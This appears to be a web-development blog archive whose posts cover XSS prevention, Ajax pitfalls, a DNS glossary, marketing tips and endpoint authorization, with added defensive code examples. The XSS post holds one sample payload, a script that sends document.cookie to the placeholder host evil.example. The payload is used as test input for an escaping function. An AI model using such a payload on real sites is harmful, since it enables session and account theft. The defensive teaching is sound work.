Apr 29th

Preventing Cross-Site Scripting Attacks

Filed under Learn AJAX, Web 2.0, Web Development

Cross-site scripting, or XSS, is one of the most common attacks not only against Ajax-based websites but against almost any website that accepts user input. The attack predates Ajax. A well-known case is the 2005 worm that hit MySpace.com (the Samy worm): a short piece of JavaScript embedded in one user’s profile ran in the browser of everyone who viewed that profile, added its author as a friend, appended the words “but most of all, samy is my hero” to the viewer’s own profile, and copied itself there. Because every viewer’s profile became a new host, it spread exponentially and reached roughly a million profiles in under a day. The author later published the code and a technical explanation. The worm did not steal any information, but that was the author’s choice, not a limit of the technique: script running inside a victim’s browser session can do anything the victim can do on that site, including reading their data and acting in their name.

Here are some practices that reduce a site’s exposure to XSS.

1. Filtering Input

One of the main reasons websites suffer this kind of attack is that they do not screen anything that arrives from outside. Notice that YouTube and most blogging platforms limit what a user may post to a handful of simple formatting tags such as bold and italic, perhaps a link, and nothing that executes. Some sites go further and allow JavaScript to be part of a post; once that is admitted, the attacker controls everything the viewing user can do on the site. The attacker may need more code to take the application over completely, but simple functions are enough to read cookies, session identifiers and form contents and send them elsewhere. Filtering input means deciding, on the server, exactly which tags and attributes are allowed (an allowlist, never a list of known-bad patterns, which attackers routinely bypass with encoding tricks and unusual tag forms) and rejecting or stripping everything else. Filtering on its own is not enough, because the same text may later be placed into an attribute, a URL or a script, where different characters are dangerous; the text also has to be encoded when it is written out.

2. Disabling Functions

This security measure has its pros and cons. Its most obvious advantage is that nothing outside what you have specified can run: you refuse any active content in user-supplied material, whether JavaScript, Flash, Java applets or other embedded objects. The disadvantage is that you also lose the ability to offer those features yourself. If you are running a simple forum, disabling them causes no problem. If your site is built around user-contributed video, music or code, disabling everything would cripple your own operation, and the realistic compromise is to host such content on a separate domain so that a script inside it cannot reach your users’ sessions on the main site. (The browser-enforced form of the same idea is a Content-Security-Policy header, which can forbid inline scripts page-wide so that an injected script does not run even if filtering fails.)

3. Treat Incoming Content as Text, Not Code

If you cannot do without user-supplied formatting, here is the reliable trick: never let user text reach the page as raw HTML. HTML-encode it when you write it out, so that the < of a <script> tag becomes &lt; and renders as a literal character instead of starting a tag. If users need formatting, let them write in a restricted markup language such as Markdown or Textile, convert that to HTML yourself, and then run the result through an allowlist HTML sanitizer, because both converters pass embedded HTML through unchanged. A script that arrives as plain <script> text is then harmless: it is displayed, not executed. Here are three projects that provide code for this:

1. http://hp.jpsband.org/ (HTML Purifier, an allowlist HTML sanitizer)
2. http://daringfireball.net/projects/markdown/
3. http://textism.com/tools/textile/

None of the three is a complete solution on its own. Markdown and Textile are formatting converters and do not strip HTML or JavaScript, so either must be paired with a sanitizer; HTML Purifier is the one that actually enforces an allowlist of tags and attributes. Even with the library properly installed, the encoding has to match the context the text lands in: a text node, an attribute value, a URL and a script block each need their own escaping, and getting any one of them wrong is still an XSS.
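The following is an added example, not code from the original post, showing the approach of sections 1 and 3 together: untrusted text is HTML-encoded first, and the only formatting a user can produce comes from a tiny allow-listed syntax (*bold*, _italic_) that the renderer itself turns into tags. The link rule (http and https only) and the sample payload are assumptions. On a real site the same escaping runs on the server, and a library such as HTML Purifier would replace the hand-written renderer once richer markup is needed.

```javascript
// Added example, not from the original post. Escape first, then render a tiny
// allow-listed markup, so no user-supplied tag or attribute ever reaches the page.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Output encoding for the HTML text and quoted-attribute contexts: every
// character that could start a tag, end an attribute or begin an entity is
// replaced by its entity, so the browser shows it instead of interpreting it.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allow-list renderer. The user may write *bold* and _italic_; nothing else is
// markup. Because escaping happens before the replacements, the only tags in
// the result are the <b> and <i> emitted here, and they carry no attributes.
function renderPost(untrusted) {
  return escapeHtml(untrusted)
    .replace(/\*([^*\n]+)\*/g, '<b>$1</b>')
    .replace(/_([^_\n]+)_/g, '<i>$1</i>');
}

// The URL context needs its own rule: escaping does not stop "javascript:"
// from running once it sits in an href. Assumed policy: only http(s) links
// are allowed; anything else becomes a harmless "#".
function safeHref(untrusted) {
  const candidate = String(untrusted).trim();
  if (!/^https?:\/\//i.test(candidate)) return '#';
  return escapeHtml(candidate);
}

// A comment line: attribute-escaped link, escaped author, rendered body.
function renderComment(author, link, body) {
  return '<p><a href="' + safeHref(link) + '">' + escapeHtml(author) + '</a>: ' +
    renderPost(body) + '</p>';
}

// Constructed sample input of the kind a worm or hostile user would post.
const SAMPLE_POST =
  '*hello* <script>document.location="http://evil.example/?c="+document.cookie</script>';
```

Run renderPost(SAMPLE_POST) and the script tag comes back as visible text wrapped in a single <b>hello</b>; the same function applied to a profile page would have shown the 2005 worm’s payload to readers instead of running it.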

Apr 29th

What Works & What Doesn’t in Viral Marketing

Filed under Make Money Online, Quick Tips

Stop with the enforced e-mail forwards already! Trying to force or bribe people to forward your info to friends or family in order to be rewarded or win looks skanky in today’s ultra-permission-based world. Especially when you tell visitors nothing about their friends’ or family’s privacy in the space directly next to the e-mail form.

A true viral campaign gets forwarded because consumers are compelled to do so by the glory of the content, not because you bribed them with points or something else.

What absolutely will not work:

Suggesting that e-mail recipients forward your message to their friends and family will not work. Adding a line at the bottom of your e-mail that reads “Please feel free to forward this message to a friend” is more likely to get it deleted than forwarded.

What absolutely will work:

Offering something worthy of sharing like a valuable discount, vital information or offering an incentive for sharing like additional entries into a sweepstakes or an added discount or premium service will work.

Relevant or timely information, research, or studies that are included in your e-mail might encourage the recipients to share with their family and friends. Interactive content like a quiz or test, especially if it’s fun, will inspire forwarding.

Jokes and cartoons are almost always forwarded to everybody the recipient knows.  Why?  Because they are entertaining and entertainment is meant to be shared.

A really cool multimedia experience is always going to achieve a lot of pass-along. Rich media is new and the novelty and tech factors alone are often enough to make the e-mail recipient eager to share it.

Oops! Almost forgot one really important thing. You can craft a brilliant e-mail following all the rules, but if a consumer visits your site and has an experience less than what was promised, you are going to achieve viral marketing, alright, the bad kind. So be certain that your product or service is ready and is as advertised.

Apr 29th

Domain Name Help and Glossary

Filed under Quick Tips, Web Development

A Record:
An ‘A record’ is part of the zone file. It is used to point Internet traffic to an IP address. For example, you can use an ‘A record’ to designate abc.yourdomain.com to send traffic to your website at IP address 209.15.32.135. You can also designate xyz.yourdomain.com to go to a separate IP address.

DNS:
The Domain Name System (DNS) helps users to find their way around the Internet. Every computer on the Internet has a unique address - just like a telephone number - which is a rather complicated string of numbers. It is called its ‘IP address’ (IP stands for ‘Internet Protocol’). IP Addresses are hard to remember. The DNS makes using the Internet easier by allowing a familiar string of letters (the ‘domain name’) to be used instead of the arcane IP address. So instead of typing 207.151.159.3, you can type www.internic.net. It is a ‘mnemonic’ device that makes addresses easier to remember.

Domain Name:
A domain name, such as MixedSoup.com, signifies your own address on the Internet. As no two parties may ever hold identical domain names, it is truly a unique identifier of you or your company. It is how your customers will remember you and find you among the millions of other websites on the Internet.

Domain Name Registration:
To own your preferred domain name, you need to register it on the Internet. This paid service is offered by several websites, who register your domain name, provided it is not taken-up yet by anyone else. When you register a domain name, you are inserting an entry into a directory of all the domain names and their corresponding computers on the Internet.

Domain Name Servers:
Servers that hold a domain’s zone data and answer DNS queries for it, translating names under that domain into IP addresses and other records for any client on the Internet. Every registered domain must list at least two.

Domain Name Transfer:
At times a domain is sold to another organization, or a company changes its name. Most registrars require proof of authorization from the current registrant, typically a transfer authorization code obtained from the losing registrar plus confirmation sent to the registrant’s contact address, before handing control to the new owner. The exact procedure for a transfer of ownership depends on the registry and the registrars involved.

Domain Lock:
This facility helps keep your domain secure from disgruntled ex-employees and hackers. Once you activate Domain Lock, no changes to your domain are permitted. You must unlock the domain yourself before it can change hosting, contacts or registrant, or be transferred out to another registrar.

The Domain Lock section is separately protected, meaning only the authorized user can reach it. The account username and password are not enough: it asks additional questions such as “what’s your mother’s maiden name?” or “what is your pet’s name?”. These are meant to be facts only you know. In practice such answers are often guessable or discoverable from public sources, so treat them as a hurdle on top of a strong, unique account password, not as a substitute for one.

Email Auto-responder:
An auto-responder is a mailbox which automatically sends a pre-formatted response message to senders. For example, if you have an info@domain.com mailbox that receives information queries from your customers, you can configure the mailbox to immediately send a pre-formatted information message to the sender of each incoming mail. For instance, “Thanks for writing in. We shall reply to you within 2 business days”.

Email Alias:
An email alias is one or more additional names that direct mail to an email address. For example, if your email address is sales@domain.com, then you may choose to create aliases like salesenquiry@domain.com and prospects@domain.com, which can be programmed to deliver all mail to a single email address - sales@domain.com.

Email Forwarding:
Having email automatically sent (forwarded) from one or more addresses to another address, or several, that you specify. With ‘unlimited email forwarding’ (a catch-all), any address of the form anything@domain.com is delivered to the forwarding address: support@domain.com, partner@domain.com and sales@domain.com would all arrive at the account you specified, though some hosts let you route each one to a different account.

FQDN (Fully Qualified Domain Name):
Consists of a host and domain name, including the top-level domain. For example, www.MixedSoup.com is a FQDN - www is the host, MixedSoup is the second-level domain, and .com is the top level domain.

ICANN:
Internet Corporation for Assigned Names and Numbers (ICANN) is a non-profit corporation that took over from the U.S. Government the coordination of certain Internet technical functions, including management of the Internet domain name system. More information about ICANN can be found at http://www.icann.org.

MX Record:
MX (Mail Exchange) record is part of the zone file and is used to designate which mail server machine should process email for a specific domain.

Registrant:
The individual or organization that registers a specific domain name with a registrar. This individual or organization holds the right to use that specific domain name for a specified period of time, provided certain conditions are met and the registration fees are paid. This person or organization is the ‘legal entity’ bound by the terms of the Domain Name Registration Agreement with the registrar.

Registry:
An Internet domain name registry is an entity that receives domain name service (DNS) information from domain name registrars, inserts that information into a centralized database and propagates the information in Internet zone files on the Internet so that domain names can be found by users around the world via applications such as the world wide web and email.

Registry Registrar Protocol (RRP):
A protocol for the registration and management of second level domain names and associated name servers in both Top Level Domains (TLDs) and country code Top Level Domains (ccTLDs). This protocol was developed by the VeriSign registry for use within the Shared Registration System. RRP is a TCP-based, 7-bit US-ASCII text protocol that permits multiple registrars to provide second level Internet domain name registration services in the top level domains (TLDs) administered by a TLD registry. It has since been superseded by the Extensible Provisioning Protocol (EPP).

Second Level Domain Name:
It is that portion of the domain name that appears immediately to the left of the top-level domain. For example, the ‘MixedSoup‘ in ‘MixedSoup.com‘. Second level domain names are used to represent businesses and other commercial concerns on the Internet.

URL (Uniform Resource Locator):
The web address, or location, of a website, file, or resource on the Internet (e.g. http://www.MixedSoup.com/ is a URL).

Zone File:
Files residing on a nameserver that define a domain name, its subdomains, their IP addresses and its mail servers. Parts of the zone file include the SOA and NS records that identify the zone and its nameservers, plus the ‘A record’, CNAME and MX records.
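As an added illustration, not part of the glossary, here is a minimal BIND-style zone file that puts the A record, CNAME, MX and zone file entries above together for yourdomain.com. It reuses the IP address from the ‘A record’ entry; the host names, the other IP addresses, the mail server and the TTLs are assumptions.

```zone
; Added example, not from the glossary. Zone for yourdomain.com.
; 209.15.32.135 is the address used in the glossary; the other addresses,
; host names and timers are assumed values.
$TTL 3600
$ORIGIN yourdomain.com.
@       IN SOA  ns1.yourdomain.com. hostmaster.yourdomain.com. (
                2008042901 ; serial (YYYYMMDDnn, increment on every change)
                3600       ; refresh
                900        ; retry
                1209600    ; expire
                300 )      ; negative-cache TTL
        IN NS   ns1.yourdomain.com.       ; the domain name servers for the zone
        IN NS   ns2.yourdomain.com.
        IN MX   10 mail.yourdomain.com.   ; MX record: which machine receives mail
@       IN A    209.15.32.135             ; A record for the bare domain
abc     IN A    209.15.32.135             ; abc.yourdomain.com -> the web server
xyz     IN A    209.15.32.136             ; xyz.yourdomain.com -> a separate address
www     IN CNAME abc                      ; alias; resolvers follow it to abc's A record
mail    IN A    209.15.32.137             ; MX targets must be A records, never CNAMEs
ns1     IN A    209.15.32.138
ns2     IN A    209.15.32.139
```

Two checks worth making on any zone you publish: the serial must increase on every edit or secondary servers will keep serving the old data, and the host named in the MX record must resolve through an A record rather than a CNAME, which many mail servers reject.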

Apr 29th

What Is Search Engine Optimization

Search Engine Optimization is the process of choosing the most appropriate targeted keyword phrases for your site and ensuring that the site ranks highly for them, so that when someone searches for those phrases your site appears at the top. It involves fine-tuning the site’s content, HTML and meta tags, along with an appropriate link-building process. The most popular search engines are Google, Yahoo, MSN Search, AOL and Ask Jeeves. Search engines keep their methods and ranking algorithms secret, both to get credit for finding the most valuable results and to deter spam pages from clogging them. A search engine may use hundreds of factors when ranking listings, and both the factors and the weight each carries may change continually. Algorithms differ so widely that a page ranking #1 in one search engine could rank #200 in another. New sites need not be “submitted” to search engines to be listed: a single link from a well-established site will get the search engines to visit the new site and begin to spider its contents. It can take from a few days to several weeks after such a link appears for all the main search engine spiders to start visiting and indexing the new site.

If you are unable to research and choose keywords and work on your own search engine ranking, you may want to hire someone to work with you on these issues.

Search engine marketing and promotion companies will look at the plan for your site and make recommendations to increase your search engine ranking and website traffic. If you wish, they will also provide ongoing consultation and reporting to monitor your website and recommend edits and improvements to keep your traffic flowing and your ranking high. Normally your search engine optimization experts work with your web designer to build an integrated plan from the start, so that all aspects of the design are considered at the same time.

Apr 29th

Ajax Disadvantages

Filed under Learn AJAX, Web 2.0, Web Development

Introduction

Ajax is the acronym for Asynchronous JavaScript and XML. It incorporates a suite of technologies aimed at improving the user experience of web pages. It lets script running in the browser exchange data with the server in the background, whatever language the server side is written in, and ideally without a perceptible delay. A primary aim of Ajax is to reduce the waiting users do when interacting with a page: its frameworks and components let a web application fetch and update only what it needs, without reloading the entire page.
Updates can therefore happen without user interaction, and the user does not have to sit through a full page load while a request is processed. Ajax ultimately aims to produce Rich Internet Applications (RIAs). Content is refreshed incrementally within a single page, and this single-page interface increases interactivity.
When Ajax became consolidated as a technique in 2005, it did so amid much media hype. This article describes the Ajax methodology that created that hype and outlines some of its disadvantages.

Background and Components

Jesse James Garrett coined the term in a 2005 article entitled “Ajax: A New Approach to Web Applications.” The programming style it described builds on a set of open web standards. Open standards encourage competition and interoperability among implementations, which is good news for the user because it makes a solution tailored to their needs more likely.
Ajax works through the collaboration of several technologies, and a familiarity with these building blocks helps in any discussion of its disadvantages. Ajax uses a combination of XHTML (Extensible Hypertext Markup Language), CSS (Cascading Style Sheets), JavaScript, the XMLHttpRequest object and XML. XHTML provides a standardized markup language for the page’s structure; in an Ajax application, parts of that structure are rewritten by script in the browser in response to data fetched from the server.
CSS handles styling and formatting. JavaScript is supported by both the Microsoft and Netscape browsers, which makes it usable across many platforms and operating systems; it provides a standardized scripting language that is quick to write for web development. XML formats the data transferred between client and server so that both sides can read it; these documents are typically generated dynamically by server-side scripting.

Disadvantages

When Ajax emerged as a methodology, it did so amid considerable media hype. Ajax was positioned to revolutionize web development in the way the “dot-com” boom had in the late 1990s. Yet Ajax is often seen as merely the re-use of technologies programmers already had. Some of the interfaces, while providing the convenience of a single page, were confusing and difficult to navigate. Another glitch stems from limited browser integration. Ajax creates dynamic pages, tailored to what the user does.
Because those updates happen without a page load, the browser’s history mechanism does not see them. This results in inconvenience and delay: clicking “back” to return to a previous view or search may not behave as expected, or may leave the application altogether. The dynamic updates that are part and parcel of Ajax also make bookmarking difficult: a bookmark records only the original URL, so when the user returns the page may not contain the desired information. Another concern is response-time lag.
There might be a lag, for example, while the interface loads pre-fetched data and handles its request objects. Visually, this can mean that different segments of the interface appear at different times, creating confusion. Sites using Ajax must also take care to expose their content at public URLs, because some search engines are not equipped to execute JavaScript and will never see what Ajax fetches. A related disadvantage is that reliance on JavaScript means a site built with Ajax requires testing on several browsers: browsers implement JavaScript and the DOM with differences, and heavily customized code can end up incompatible with some of them.

Search for Solutions

In keeping with Ajax’s spirit of innovation, many solutions to these problems have been implemented. Hidden IFRAMEs, for example, allow history entries to be recorded. URL fragment identifiers (the part after “#”, which the browser can change without a page load) let users bookmark and return to a particular state of an application, and they restore back-button behaviour as well. Microsoft’s ASP.NET AJAX Extensions include an UpdateProgress control that tells the user a region of the page is being updated, which reduces confusion during lag. Ajax products continue to be reconfigured and recombined with newer technologies to improve the web user experience.
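As an added example, not from the article, here is the fragment-identifier technique from the paragraph above in code. The state keys and their formats are assumptions for a hypothetical mail application. The point a practitioner should take from it is that the fragment is parsed against an allow-list: anything after “#” is input an attacker can put in a link, so it is validated rather than trusted.

```javascript
// Added example, not from the article. Application state lives in the URL
// fragment so bookmarks and the back button work; the fragment is parsed with
// an allow-list because location.hash is attacker-controllable input.

// Hypothetical state keys and the only values each may take.
const ALLOWED_KEYS = {
  page: /^\d{1,4}$/,
  tab: /^(inbox|sent|drafts)$/,
  q: /^[\w .-]{0,64}$/,
};

// Serialize the known keys, in a fixed order, into "#key=value&key=value".
function encodeState(state) {
  const parts = [];
  for (const key of Object.keys(ALLOWED_KEYS)) {
    if (state[key] !== undefined) {
      parts.push(encodeURIComponent(key) + '=' + encodeURIComponent(state[key]));
    }
  }
  return '#' + parts.join('&');
}

// Parse a fragment back into state. Unknown keys, values that fail their
// pattern, and malformed percent-encoding are dropped, never passed on to
// the page (putting a raw fragment into innerHTML is a classic DOM XSS).
function decodeState(hash) {
  const state = {};
  const body = (hash || '').replace(/^#/, '');
  if (!body) return state;
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    let key;
    let value;
    try {
      key = decodeURIComponent(pair.slice(0, eq));
      value = decodeURIComponent(pair.slice(eq + 1));
    } catch (e) {
      continue; // malformed escape such as "%E0"
    }
    const rule = ALLOWED_KEYS[key];
    if (rule && rule.test(value)) state[key] = value;
  }
  return state;
}

// Browser wiring (defined here, only meaningful in a page): restore state on
// load and on back/forward, and return a function the app calls to publish
// a new state into the fragment, which creates a history entry.
function installFragmentHistory(applyState) {
  window.addEventListener('hashchange', () => applyState(decodeState(window.location.hash)));
  applyState(decodeState(window.location.hash));
  return (state) => { window.location.hash = encodeState(state); };
}
```

In a page, installFragmentHistory(render) would be called once after the DOM is ready; every call to the returned function then yields a bookmarkable URL such as page.html#page=2&tab=sent.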

Apr 29th

Building an Ajax Loader

Filed under AJAX Design, Web 2.0

Sometimes the exchange between the server and the client breaks down and absolutely nothing is loaded into the web page. Most of the time the concept is easy: create and configure the XMLHttpRequest correctly and the content arrives. The problem usually occurs when the request object is not created in a way the visitor’s browser supports, so the request never goes out and the XML or HTML you expected never arrives.

One way to make sure the content loads is to wrap the whole exchange in an Ajax loader function. There are many scripts and samples out there, but for today’s post we will look at a very popular one written by Eddie Traversa.

What makes this loader remarkable is its simplicity: anyone with some experience of Ajax and JavaScript will see immediately how to customize it. It fetches a file over HTTP with XMLHttpRequest and writes the response into a page element, so it works for an XML file just as well as for a fragment of HTML. When your page transmits data asynchronously, XMLHttpRequest handles that stream of information; the loader wraps it so you can reuse the same call throughout the site.

There are just three steps to complete this function. Remember they can be customized according to your design specifications.

First is to load this code to your webpage’s header:

<HEAD>
<style type="text/css">
<!--
#contentLYR {
  position: absolute;
  width: 200px;
  height: 115px;
  z-index: 1;
  left: 200px;
  top: 200px;
}
-->
</style>
<script type="text/javascript">
<!-- Begin
// Fetch `url` with XMLHttpRequest and write the response into the element `id`.
function ajaxLoader(url, id) {
  var x = null;
  if (document.getElementById) {
    // Older Internet Explorer exposes the request object through ActiveX;
    // every other browser provides XMLHttpRequest natively.
    x = (window.ActiveXObject) ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
  }
  if (x) {
    x.onreadystatechange = function() {
      // readyState 4 = finished; status 200 = the file was served successfully.
      if (x.readyState == 4 && x.status == 200) {
        var el = document.getElementById(id);
        // The response is parsed as HTML, so only load files you control.
        el.innerHTML = x.responseText;
      }
    }
    x.open("GET", url, true);
    x.send(null);
  }
}
//-->
</script>
</HEAD>

Note that the script picks the request object for whichever browser the visitor has: ActiveXObject for older Internet Explorer, XMLHttpRequest everywhere else. The head section is complete in itself, so you can paste it into an existing page or use it as the head of a new one.

Next, call the loader from the body’s onload event handler so the file is requested as soon as the page has finished loading:

<BODY onload="ajaxLoader('demo.xml','contentLYR')">

Of course, you can replace ‘demo.xml’ with any file of your own, even a small piece of HTML. The attribute must go on the BODY tag, or nothing will run. Because the loader writes the response into the page with innerHTML, the browser renders any markup the file contains, including tags carrying event handlers, so only point it at files you control and never at a URL derived from user input.

Lastly, place this code in the body of the html file:

<div id="contentLYR">
</div>

The div is the target: the loader looks it up by its id and replaces its contents with whatever the server returned.

In summary: the script in the head defines the loader and tells the page that an asynchronous request is coming. The onload handler then triggers the request for the XML file through XMLHttpRequest. Lastly, a plain HTML div gives the fetched content a place to land in the page.

As you can see, the Ajax loader is very easy to use and customize. Credit is due to Eddie Traversa for providing us this code that could upgrade the performance of any Ajax based site.

AJAX Load XML File Script Authored by Eddie Traversa is featured on Dynamic Drive (http://www.dynamicdrive.com/)
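The following is an added example and not Eddie Traversa’s script: the same fetch-and-insert loader with the three changes a security reviewer would ask for. The response is inserted as text unless the caller explicitly opts into HTML, so a fetched file cannot inject script into the page; the URL must be a same-site relative path such as demo.xml; and failures are reported instead of silently ignored. The request factory is a parameter so the logic runs without a browser. The option names and the URL policy are assumptions.

```javascript
// Added example, not Eddie Traversa's script. Same idea as the loader above,
// hardened: text insertion by default, relative URLs only, errors surfaced.

// Accept "demo.xml" or "/data/demo.xml"; reject any scheme ("http:",
// "javascript:"), protocol-relative "//host/..." and backslash variants, so a
// url influenced by user input cannot point the loader somewhere else.
function isSafeRelativeUrl(url) {
  if (typeof url !== 'string' || url.length === 0) return false;
  if (/^[a-z][a-z0-9+.-]*:/i.test(url)) return false;
  if (url.startsWith('//') || url.startsWith('\\\\')) return false;
  return true;
}

// Fetch `url` and place the response into `target`. Resolves with the body,
// rejects on a refused URL or a non-200 response. `createRequest` defaults to
// the browser's XMLHttpRequest and is assumed to be injectable for testing.
function ajaxLoader(url, target, options) {
  const opts = Object.assign(
    { asHtml: false, createRequest: () => new XMLHttpRequest() },
    options
  );
  if (!isSafeRelativeUrl(url)) {
    return Promise.reject(new Error('refusing to load non-relative URL: ' + url));
  }
  return new Promise((resolve, reject) => {
    const x = opts.createRequest();
    x.onreadystatechange = function () {
      if (x.readyState !== 4) return;               // not finished yet
      if (x.status !== 200) {                       // missing file, server error
        reject(new Error('HTTP ' + x.status + ' while loading ' + url));
        return;
      }
      if (opts.asHtml) {
        target.innerHTML = x.responseText;          // only for files you control
      } else {
        target.textContent = x.responseText;        // shown literally, never executed
      }
      resolve(x.responseText);
    };
    x.open('GET', url, true);
    x.send(null);
  });
}

// Browser usage (not run offline):
//   window.onload = function () {
//     ajaxLoader('demo.xml', document.getElementById('contentLYR'))
//       .catch(function (err) { console.error(err); });
//   };
```

The default of textContent is deliberate: the original loader’s innerHTML is exactly what turns a compromised or user-influenced file into script running in every visitor’s browser, so rendering as HTML is something the caller has to ask for.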

Apr 29th

How to enable really big roaming user profiles if needed i.e. roam a lot of stuff

Filed under Quick Tips, Windows Vista

A Group Policy setting found at User Configuration\Administrative Templates\System\User Profiles\Limit Profile Size can be used to limit the size of roaming user profiles, but this setting has a hard-coded maximum of 30MB. What if you need to allow roaming profiles to exceed this limit? If your client computers are running Windows Vista then you’re in luck as you can use Folder Redirection to reduce your profile size by redirecting hefty folders such as Documents, Music, Pictures etc. Folder Redirection and Roaming User Profiles can work well together, see Chapter 14 Managing Users and User Data in the Windows Vista Resource Kit for more info.

Apr 29th

Security and Privacy on MySpace

Filed under Quick Tips, Social Networks

Is there security and privacy on MySpace? This can be a difficult question to answer because there are many possible answers. There can be a certain degree of security and privacy available on MySpace but as with any online community there is also the potential for unsafe situations and violations of privacy. However, there are a couple of ways MySpace members can ensure they are receiving the highest levels of security and privacy possible. This includes being familiar with the terms of service, taking active measures to protect yourself and making use of the privacy features included in the software.

Read the Terms of Service Carefully

Reading the terms of service carefully can give users an understanding of the amount of security and privacy available on MySpace. These terms provide members with useful information about the types of activities or content that are prohibited on MySpace. Understanding these rules helps members judge whether their own actions or those of other members violate the terms of service. While the MySpace administrators do not have a policy of policing the community for content violations, they will respond to reports from other members and take appropriate action if a member is in fact found to be in violation. These actions may include deleting the member’s account and taking appropriate legal action.

The MySpace privacy policy is referenced within the terms of service and this reference incorporates the entirety of the privacy policy into the terms of service. As a result members who join the MySpace community and agree to the terms of services are also, by default, agreeing to the privacy policy. Therefore, members should carefully review the privacy policy and familiarize themselves with the terms of this policy.

Protect Yourself on MySpace

Members of MySpace do have a small degree of protection afforded by the administrators of MySpace but they can provide themselves with a great deal of additional protection by being aware of how the Internet works and using common sense. Generic safety tips for protecting oneself on the Internet also apply to the MySpace community. Just like it is not wise to give out sensitive information such as your address or social security number on online discussion boards, it is not wise to list this type of information on a MySpace profile either.

MySpace members may think the information they post on their profile is only being viewed by their friends and the members of their extended network but this is not true. There can be many individuals on MySpace who are lurking and viewing members’ websites all the time. Some of these lurkers may be completely innocent but others may be harvesting information.

Making Profiles Private

MySpace does have some features which can give members an increased amount of protection. The ability to make a profile private is one of these features. Most MySpace profiles are public and are viewable by both members of the community and nonmembers. However, those who wish to keep their website private can make it only available to those on their friends list.

Members of MySpace also have the ability to remove members from their friends list or block other members from sending them emails or instant messages. Only members in your friends list can post comments on your website so if there are members who are leaving malicious comments, you can remove them from your friends list to avoid future problems. Also, if you are receiving harassing emails or messages you can block users to prevent them from contacting you in the future.

Apr 28th

Generate Website Traffic with Postcards

Promoting your website is getting more difficult these days. New marketing tactics come and go fast. They work for a while then quickly fade away. Just keeping up with the changes can be a full time job. Here’s a proven way you can generate lots of traffic to your website …one that hasn’t faded away. In fact, it actually works better now than ever before - and you probably haven’t even tried it. What is it? Go offline and promote your website with postcards.

But, you say, “I’m an internet marketer, not a direct mail marketer.” Right, and so are most of your competitors.

That’s why they don’t market with postcards …and why most of them are not likely to try postcards anytime soon.

You won’t have much competition. Maybe that’s one of the reasons why postcards work so well for internet marketers.

It Costs Less than You Think

The cost for printing postcards starts at just a few cents each, depending on how you print them. And you can send postcards by First Class Mail in the US for just 26 cents each if you keep them between 3 1/2 to 4 1/4 inches high and between 5 to 6 inches wide.

OK. So you’re ready to give postcards a try. But where do you begin?

1. Start with the Mailing List

You’ll get a good response to your postcards if you send them to prospects already interested in what you offer.

You’ll get an even better response if those prospects also have a proven history of acting on offers they receive.

For example, get a list of prospects who previously requested information (or actually bought) something similar to what you sell - or a list of paid subscribers to a publication targeting the same interests that make them good prospects for what you sell.

You can get these and other similar lists from most mailing list brokers.

2. Don’t Forget Why You’re Mailing Postcards

The purpose of your postcards is to get the readers to visit your website (take an action). It’s not to close a sale for money (make a purchase). Postcards are too small to be effective at closing sales. Closing sales is what your website is designed to do.

3. Decide What to Say on Your Postcard

You don’t need to come up with a strategy to persuade people to read your postcard. It will be delivered with the message exposed and ready to read. So get right to the point.
Don’t focus on your product or service. Instead, spotlight the major benefits your product or service provides. That will arouse the reader’s interest and motivate them to find out more about those benefits …by going to your website.

Tip: Offer a bonus to those who visit your site before a specific deadline. It will boost the response.

That’s it. Just 3 simple steps. Try it. You’ll discover a profitable way to generate lots of website traffic - one you can use for many years to come.

Apr 28th

Preventing Improper Authorization in Ajax

Filed under Learn AJAX, Web 2.0, Web Development

On a traditional server-rendered HTML website, developers have the luxury of keeping the sensitive parts to themselves. When you log in to the admin page, the server decides on every request whether you are allowed to see it, and only the rendered result is sent to the browser. Without a username and password an attacker sees nothing of the logic behind the page and has little to go on beyond what the public pages expose.

An Ajax-based website does not have the same luxury. Its client-side JavaScript is delivered to every visitor, so it is not just the server that sees the code: everyone can read which server endpoints it calls, with what parameters and in what order. An attacker does not need to drive the interface at all; with the endpoint names in hand they can call the server directly, including the calls that were only ever meant to be made from the administrator’s screens. If those endpoints rely on the admin interface being hidden rather than checking the caller’s session themselves, the admin username and password are irrelevant: the data is one crafted request away.

This usually happens when an existing HTML site is converted to Ajax, or “Ajaxified”. Remember that the two are built differently. In the HTML version, an administrative function was reachable only through a page the server refused to render without a login, so the check on that page covered it. Once the same function becomes an endpoint called from JavaScript, the page-level check no longer applies, yet the source code describing the endpoint is visible to every user, whether or not they have the faintest idea of the username and password. Consider what such an endpoint might hand over if it is not protected on its own: user statistics, personal information and, the hacker’s favourite, credit card information.

If you are thinking what I was thinking, the first instinct is to hide the information: put the functions and the data in a folder that is not shared or linked anywhere. That seemed reasonable, since a folder nobody knows about cannot be browsed. But I was wrong, way wrong. The hidden folder sits on the same server the attacker is already talking to, and the JavaScript that calls it has to name the path, so the “secret” location is disclosed to anyone who reads the page source. Keeping the folder in an obscure location buys time at most; more often than not it protects nothing at all.

So what can you do? Fortunately there is something: every server-side function an Ajax page can call must enforce its own authorization. Before doing anything, it verifies the caller’s session and checks that this user is allowed to perform this action on this particular record, and it takes that identity from the session on the server, never from a parameter the client sent. It is a challenge when you have many functions, and it is tedious to add the checks one by one, but there is no shortcut given how exposed an Ajax endpoint is. Make the default deny: an endpoint that has not been explicitly opened to a role should refuse every request.

The solution is very simple but very tiresome, and it is the price you pay for a secure website. Always remember that the page-level authorization of an HTML site does not carry over to the endpoints of an Ajax-based one.
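As an added example, not the post’s code, here is the deny-by-default dispatcher the last paragraphs describe, written as the server side of a hypothetical Ajax application: every endpoint declares which roles may call it and, where a record belongs to a user, whether the caller owns it. The endpoint names, roles and sample data are assumptions. The session object stands for what the server looked up from its own session store; nothing in the request parameters is trusted for identity.

```javascript
// Added example, not from the original post. Server-side dispatch for Ajax
// endpoints with authorization enforced per function, default deny.

// Hypothetical endpoint table. `allow` lists the roles that may call the
// endpoint; `owns`, where present, ties the record to the calling user.
// Handler bodies return constructed sample data.
const ENDPOINTS = {
  '/api/profile': {
    allow: ['user', 'admin'],
    owns: (session, params) => session.user === params.user,
    handler: (session, params) => ({ user: params.user, email: params.user + '@example.com' }),
  },
  '/api/stats': {
    allow: ['admin'],
    handler: () => ({ users: 42, posts: 1234 }),
  },
  '/api/cards': {
    allow: ['admin'],
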